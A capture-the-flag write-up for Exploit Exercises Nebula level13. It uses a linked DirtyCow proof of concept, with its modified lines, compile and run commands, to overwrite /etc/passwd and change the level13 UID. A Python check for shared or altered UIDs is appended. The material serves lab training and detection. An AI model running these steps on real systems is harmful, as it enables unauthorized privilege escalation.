Solving Exploit Exercises Nebula Level13 using DirtyCow

November 08, 2017

When you got nothing better to do

[email protected]:~$ /home/flag13/flag13 
Security failure detected. UID 1014 started us, we expect 1000
The system administrators will be notified of this violation

Use this PoC - https://gist.github.com/chriscz/f1aca56cf15cfb7793db0141c15718cd

Modify lines 22, 23 and 136 as follows:

[email protected]:~$ grep -E "define REPEAT|size <= mmapsize"  mucow.c 
#define REPEAT 10000 /* 100 */ 
#define REPEAT_WORD 10000 /* 100 */ 
//assert(size <= mmapsize);

Compile

[email protected]:~$ gcc -pthread mucow.c -o mucow

Copy and edit /etc/passwd

[email protected]:~$ cp /etc/passwd passwd_new
[email protected]:~$ grep level13 passwd_new
level13:x:1014:1014::/home/level13:/bin/sh
[email protected]:~$ vi passwd_new 
[email protected]:~$ grep level13 passwd_new
level13:x:1000:1014::/home/level13:/bin/sh

Run the exploit

[email protected]:~$ ./mucow /etc/passwd < passwd_new 

Watch /etc/passwd. Once the UID for level13 has changed, you can stop.

Log out and log in again as user level13

ssh [email protected]
[email protected]'s password: 
[email protected]:~$ whoami
nebula
[email protected]:~$ /home/flag13/flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58

Yay!
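
Seen from the defender's side, the edit above leaves two accounts on one UID and a UID that no longer matches its known-good value. The following check for both is an added example, not part of the original post; the level13 lines come from the walkthrough, while the root, nebula and level12 entries and all function names are assumptions made for illustration.

```python
from collections import defaultdict

# Constructed sample data. The level13 lines are the before/after entries shown
# in the walkthrough; the root, nebula and level12 lines are assumptions.
COMMON = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "nebula:x:1000:1000:nebula:/home/nebula:/bin/bash\n"
    "level12:x:1013:1013::/home/level12:/bin/sh\n"
)
BASELINE = COMMON + "level13:x:1014:1014::/home/level13:/bin/sh\n"
CURRENT = COMMON + "level13:x:1000:1014::/home/level13:/bin/sh\n"


def parse_passwd(text):
    """Return {name: uid} from passwd(5) text, rejecting malformed lines."""
    users = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            raise ValueError(f"malformed passwd entry on line {lineno}")
        users[fields[0]] = int(fields[2])
    return users


def shared_uids(text):
    """Return {uid: [names]} for every UID held by more than one account."""
    by_uid = defaultdict(list)
    for name, uid in parse_passwd(text).items():
        by_uid[uid].append(name)
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def uid_changes(baseline, current):
    """Return (name, old_uid, new_uid) for accounts whose UID differs."""
    old, new = parse_passwd(baseline), parse_passwd(current)
    return [(n, old[n], new[n]) for n in sorted(old) if n in new and old[n] != new[n]]


if __name__ == "__main__":
    for uid, names in shared_uids(CURRENT).items():
        print(f"UID {uid} shared by: {', '.join(names)}")
    for name, was, now in uid_changes(BASELINE, CURRENT):
        print(f"{name}: UID changed {was} -> {now}")
```

On a real host, keep the baseline copy somewhere the monitored accounts cannot write to and pass the live file's contents as `current`.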